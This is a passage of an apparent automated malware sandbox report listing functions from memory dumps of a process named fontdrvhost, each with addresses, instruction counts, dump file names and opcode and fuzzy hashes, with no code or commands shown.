                                                                    • Instruction ID: fc3c1c26603c6a0de278e1f7ac9f02347955d2a50e6a8ca1c6256cadb0d5cb95
                                                                    • Opcode Fuzzy Hash: d789c99e5895a939d2dc3848ee9ce25deb235c8d6e8f9c96b02a1d413f815a54
                                                                    • Instruction Fuzzy Hash: 34410B70E1491D8FDF94EF98C895AEDB7F1FF68315F10016AE409E3299CA34A981CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C108F1A Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c00900b979151455b141ccb23f1434ae8963340fb1be164f89b6d04003eb6900
                                                                    • Instruction ID: 042b24525e756607f2632b0095818132be7d161ee1a19641ccfefd7bd952cf4f
                                                                    • Opcode Fuzzy Hash: c00900b979151455b141ccb23f1434ae8963340fb1be164f89b6d04003eb6900
                                                                    • Instruction Fuzzy Hash: 6331CF12A0EAD70FE76297B858745A43FB2EF97290B0D41F7D499CB0D7DD1CA8058386
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA25BE8 Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 334b685bb77bc218a29cd46149a8d62078e7dd688f49efc9a8404604a0529fe5
                                                                    • Instruction ID: 98891814eef074080f6881488a5252f6aa67f18f176d1b8effd2e55990957e59
                                                                    • Opcode Fuzzy Hash: 334b685bb77bc218a29cd46149a8d62078e7dd688f49efc9a8404604a0529fe5
                                                                    • Instruction Fuzzy Hash: D14187B0A4491C8FDBA4DB14C854BE9B7F0FB68305F1041EAD10EE3295DB75AAC48F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C117D5D Relevance: .1, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f8e6e7f6cee01122f5da0ddff4d4ace28cb7f5871c2eb8dc3a508ac482178af2
                                                                    • Instruction ID: cccfff465865601ff90077b7983697514f1b5e37b5485ea3bff378493b909329
                                                                    • Opcode Fuzzy Hash: f8e6e7f6cee01122f5da0ddff4d4ace28cb7f5871c2eb8dc3a508ac482178af2
                                                                    • Instruction Fuzzy Hash: 6431243170CA498FDF9DEF18C4A5EA9B7E1FB69310B0441A9D44AC7292DE35EC85CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10804A Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ea49e48c77e5c2a3863b4bb83332ea589cddac5a3c2e42504eb3df077fa80bc
                                                                    • Instruction ID: eda991979113e3a062f3a6a8fc5dddbe8fe26f89e0111dd7444fd20351fd3f19
                                                                    • Opcode Fuzzy Hash: 7ea49e48c77e5c2a3863b4bb83332ea589cddac5a3c2e42504eb3df077fa80bc
                                                                    • Instruction Fuzzy Hash: 9B31D221A4F3C64FE753D374A8686E93FB1AF43364F1801EBE0859A4A3CAA90516C756
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C109E6B Relevance: .1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da29b975b634e63c9f463c92321a2eb1c07ecd61789707444ba3c8e7d79a29bc
                                                                    • Instruction ID: a0588b132438ab0c7aa4ed2d442dd5d8f6b5bd4a2189b1539720c3c17e6dbca9
                                                                    • Opcode Fuzzy Hash: da29b975b634e63c9f463c92321a2eb1c07ecd61789707444ba3c8e7d79a29bc
                                                                    • Instruction Fuzzy Hash: 0B314072F1D91A8FDB64EB98D8B19A8B3B1FF58390B104139D04EE3281DF247C128B84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C100AE5 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a5f2a68715517d37640ed6fe4b76837cd3209bba186d9875612056083184c61
                                                                    • Instruction ID: 20a2d5711fd0aa50cf524c45286a929699a2ade6e1a7f79200f6d8c3ae0f6e1b
                                                                    • Opcode Fuzzy Hash: 0a5f2a68715517d37640ed6fe4b76837cd3209bba186d9875612056083184c61
                                                                    • Instruction Fuzzy Hash: B9314836A1894BCFDBB8DF9884A16BD77B1FF58344F9400BAD00EE21A1DE3869408B45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA213C8 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15cdb90c108697e5a96e287df350cd5c69a1327109281e3b3519337fb906d565
                                                                    • Instruction ID: e2e65793bba9c0b1a01b042ef036a090dc6eeeced672053047625c8574f40b42
                                                                    • Opcode Fuzzy Hash: 15cdb90c108697e5a96e287df350cd5c69a1327109281e3b3519337fb906d565
                                                                    • Instruction Fuzzy Hash: F5319E30E0864E8BDB64EB98C8656BD77F1FF58300F51017AD00AD32A6DEB56A458B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20C25 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe3d861ac9849f90fccf7f57a93999a210606d953ca87d7cda11c8b3ade76f1f
                                                                    • Instruction ID: 24e904577671ce9bb57b0d5bcff09434b0534897234768315e57eaa7c1723c5a
                                                                    • Opcode Fuzzy Hash: fe3d861ac9849f90fccf7f57a93999a210606d953ca87d7cda11c8b3ade76f1f
                                                                    • Instruction Fuzzy Hash: 59313B71B4E64E8BE732ABA8C8612FD7BB0EF41310F05457BC455972E2CAB82605CB55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10CAE5 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0c2d79f25c2636f7771ee807342eb84943068dd0995cc158f92f0d713b3b931
                                                                    • Instruction ID: a125b2a5cb6a8ee85f7955343395319dc6248c46061dc89a3f2b7fd10de2cb27
                                                                    • Opcode Fuzzy Hash: d0c2d79f25c2636f7771ee807342eb84943068dd0995cc158f92f0d713b3b931
                                                                    • Instruction Fuzzy Hash: 0F31E732B1850BCFEBB8DB9884755BDBBB1FF58380F50017AD40AE2281DE7869449B46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10B9D2 Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99ec7bee68974e869b6e1938fd7928a272776f8b20ba0c9256512f5a5f9d3b59
                                                                    • Instruction ID: e4ad2f7b81b0203aee94845ad87c1be186267bfeb85716520a5ebf52510fa60a
                                                                    • Opcode Fuzzy Hash: 99ec7bee68974e869b6e1938fd7928a272776f8b20ba0c9256512f5a5f9d3b59
                                                                    • Instruction Fuzzy Hash: 37318C11A1C1978AE739C75884719B47B71EF92351B184AFAC0A7DB6CBC82CB8C19380
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C1098C2 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff41f07b28d3411d5bdbfaf0d3848f300b4fc978fa6e4f3b5a0704de59651c85
                                                                    • Instruction ID: 60b821c6878c74206df433f01a0610cc67e4c40a3f62b7cbfeeee1eda94aef76
                                                                    • Opcode Fuzzy Hash: ff41f07b28d3411d5bdbfaf0d3848f300b4fc978fa6e4f3b5a0704de59651c85
                                                                    • Instruction Fuzzy Hash: D721EA31E0891D8FDF98DB58C4A5AECB3B1FF6C310F0041AA901EE3295CE35A981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10E592 Relevance: .1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 437e41677b03ae54ab2ed5a890b83ee5c89ac0431b5222a1919a0b4287790bd8
                                                                    • Instruction ID: bdb7f1f3701745f1a3cbb05252d328c702ddbe02f9a4c809c0d9392c4651d137
                                                                    • Opcode Fuzzy Hash: 437e41677b03ae54ab2ed5a890b83ee5c89ac0431b5222a1919a0b4287790bd8
                                                                    • Instruction Fuzzy Hash: 5621F835E1891D9FDFA8EB58C4A5AE9B3B1FF58340F0041AAD04EE3291CE35A9918B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA25D41 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d118f527e32161ca1f6223e785a9c62a596755c660eb21e240f5ba74b8a1e23
                                                                    • Instruction ID: 554862730038dcc81a5fba718703d9c00e7d4880a32476609c12a21345160d6c
                                                                    • Opcode Fuzzy Hash: 2d118f527e32161ca1f6223e785a9c62a596755c660eb21e240f5ba74b8a1e23
                                                                    • Instruction Fuzzy Hash: 6031B870A0491C8FCFA8DB18C854BE9B3F1FB68305F1041EAD10EE32A5DA75AA84CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10E82B Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab9ccdefb181cdfc891c520f725ed2b6fce19362307fd1967e5b41aeda6d1c0a
                                                                    • Instruction ID: 8cbfa0e16520bd0e7144ab977bb8940f049af59a28f896a5208d183ebe05d665
                                                                    • Opcode Fuzzy Hash: ab9ccdefb181cdfc891c520f725ed2b6fce19362307fd1967e5b41aeda6d1c0a
                                                                    • Instruction Fuzzy Hash: 3F21F43190D68DCFCB66DF64C864AE57BB0FF46340F0800EAD44DDB1A2CA395A95CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10E82A Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a526ecec5edfc8589ca5352b476fb0b280cbe10671d3de6cb110f96a2d0c8a07
                                                                    • Instruction ID: e0c078be82f2f62d03531f4ee0acf398a301b55196d06360b03ec414e4c519bc
                                                                    • Opcode Fuzzy Hash: a526ecec5edfc8589ca5352b476fb0b280cbe10671d3de6cb110f96a2d0c8a07
                                                                    • Instruction Fuzzy Hash: 9521F73190D68DCFDB56DF64C864AD87BB0FF56340F0400EAD44DD71A2CA399995CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA211A2 Relevance: .1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b3af3d28c4a6bce9000c1a380e7fa94bd9e9b4d81aa7b7f90af3656288bbd37
                                                                    • Instruction ID: 380c9978a1f0d42adf95f6714f51148f009337b3f12b5a63324b069e8b633cb2
                                                                    • Opcode Fuzzy Hash: 6b3af3d28c4a6bce9000c1a380e7fa94bd9e9b4d81aa7b7f90af3656288bbd37
                                                                    • Instruction Fuzzy Hash: FA210E30A1891E8FEF94EF98C8949ADB7F1FF68300B11057AD419D32A5EF74A941CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C109F4F Relevance: .1, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11905bfa2ca239eb57f9cec12a6e9ebb1b6dc600f6201e0143ac30001204b936
                                                                    • Instruction ID: b4ca8e094e24f557a6005b73a07075716f949563c8f3f92f72c59574252bd79a
                                                                    • Opcode Fuzzy Hash: 11905bfa2ca239eb57f9cec12a6e9ebb1b6dc600f6201e0143ac30001204b936
                                                                    • Instruction Fuzzy Hash: E311D232F1DA4A4FEB68EB9884316ECB7A1EF59350F5401BAD05DD32C3DD2868058345
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C1095C1 Relevance: .1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2cae7c636cb0fca7eb7db137d149c12500fe32bba6689d468652ae5ce9a37e4e
                                                                    • Instruction ID: 1206d503f6f985f17155e96b275e3aff3e3fc7a061a613707f141fe46e4958e2
                                                                    • Opcode Fuzzy Hash: 2cae7c636cb0fca7eb7db137d149c12500fe32bba6689d468652ae5ce9a37e4e
                                                                    • Instruction Fuzzy Hash: C9110213F4D1938BFA39D6E568314BD66716F457E0F5842BBE85EA30C6CC0D2887239A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10AA80 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a4951cfa39e311fa279f54491bb6f9e008a2036cb1c131f88ff3b1ab9229ce5
                                                                    • Instruction ID: d8bfddf6f378c1d8ce937e721a605efe925ad93634e3499dca67377f9e9e614e
                                                                    • Opcode Fuzzy Hash: 2a4951cfa39e311fa279f54491bb6f9e008a2036cb1c131f88ff3b1ab9229ce5
                                                                    • Instruction Fuzzy Hash: C011E322F0D90B8EEB64FB6480615FA73A1EF64381B40463AD44FD31D2DE28B9458795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20C38 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16d17335290f92999ba984264b1eb02bbbd35d429891a0aa01e235dc84735ba4
                                                                    • Instruction ID: 714e23fcbb5f872ea056ae3cf6adb7994ef6708d6679cc9ca44901981b825352
                                                                    • Opcode Fuzzy Hash: 16d17335290f92999ba984264b1eb02bbbd35d429891a0aa01e235dc84735ba4
                                                                    • Instruction Fuzzy Hash: 99112971B4E68E4AE722EBA8C8212EE77A0EF81711F054577C496972E2CA7822058785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10A8FE Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b86bc7153012062a4b3193a1ffd12eb462c6e9426765613dd21565bf691aaece
                                                                    • Instruction ID: 65d8b330ec41bc830470007aee3e33fa0c7312f4084865883a39fbd12ae7c084
                                                                    • Opcode Fuzzy Hash: b86bc7153012062a4b3193a1ffd12eb462c6e9426765613dd21565bf691aaece
                                                                    • Instruction Fuzzy Hash: B6116632B0950B8FE725DB88D4212E533A1EF65391F14423AD90AC72D2DE39AA908790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C103DB8 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b844da84b02b05da98f1ff3210fe0aa065f6ec81019455dd10d0ca919ef00d3d
                                                                    • Instruction ID: 6724efdac33e964f639dac9dc3806d25c9e0da0310fec9f5ca73e69a34db1f3c
                                                                    • Opcode Fuzzy Hash: b844da84b02b05da98f1ff3210fe0aa065f6ec81019455dd10d0ca919ef00d3d
                                                                    • Instruction Fuzzy Hash: C801D232F08A4F8BF770DAA444782BD2AF1DF59381F140576E00EF7291DD686C458399
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20C40 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1f87384e305461b1c52ffbd84f41b3feb2e86618f73b296cacbf694ca556a92
                                                                    • Instruction ID: 499327435ff4a641e228befef7b80d8018350352cce3c9a8ba2e0d84cf87ee47
                                                                    • Opcode Fuzzy Hash: f1f87384e305461b1c52ffbd84f41b3feb2e86618f73b296cacbf694ca556a92
                                                                    • Instruction Fuzzy Hash: 3A112B71B4E68E8AE722EBA4C8612EE77A0EF41710F054577C456972E2CE782215C785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20B7F Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cb31d757649e5f10977a3a8b15b29dafa16ca7cad244d95d20db118d5c45952b
                                                                    • Instruction ID: 63290e0ef2e8eec0800c83b9c0f5973fc5c2b320d64d6aa7e0fae82daf5c0a89
                                                                    • Opcode Fuzzy Hash: cb31d757649e5f10977a3a8b15b29dafa16ca7cad244d95d20db118d5c45952b
                                                                    • Instruction Fuzzy Hash: 1F113971A2864E8FCB54EF68C895AEA77E0FF58718F0501AAF84DD3251D730A554CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C109542 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49dc804eebf76db433469f4e534a08d63bff68d2114a25ee6fc1b23d8be885ed
                                                                    • Instruction ID: c56a1796b036a5cadc2cdc36c408dce294fd3ae7606c53fd2d22455d8c47331d
                                                                    • Opcode Fuzzy Hash: 49dc804eebf76db433469f4e534a08d63bff68d2114a25ee6fc1b23d8be885ed
                                                                    • Instruction Fuzzy Hash: 27119231E1881EDFDFA8EB99D4A09EDB7B1FF58344F50057AD00EE3295CA3468418B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA22303 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction ID: 2432943e878e80ab3724c1f37749bcf3a04a11e244c0aa0a864535d3156a6d26
                                                                    • Opcode Fuzzy Hash: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction Fuzzy Hash: AF21D870E4A62D8EEB74EF54C859BA9B3B1EB94301F1042E9D40DA22A0DFB45B84CF44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20845 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c92bf6f24e4d8a0381e3ffcf511e90474b528085319a77b7deb45bb48ee0d22
                                                                    • Instruction ID: 15d9a2b3b9c4047868c5fb4116141bd422c5655a02b41bff2eea99bab61364a4
                                                                    • Opcode Fuzzy Hash: 2c92bf6f24e4d8a0381e3ffcf511e90474b528085319a77b7deb45bb48ee0d22
                                                                    • Instruction Fuzzy Hash: 11012C3060854D9FDB84EF98D895AEE7BE0FF64301F0100A6E858C3165CA30E5A5CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C1075CD Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38d2ae9b40e01ea4391cdf2590884496de028970a674d6282c467a8288703b6c
                                                                    • Instruction ID: 0de2aa66660ac7703ebd41422f24a13adab1e9a50a14956f34ddf850278f7124
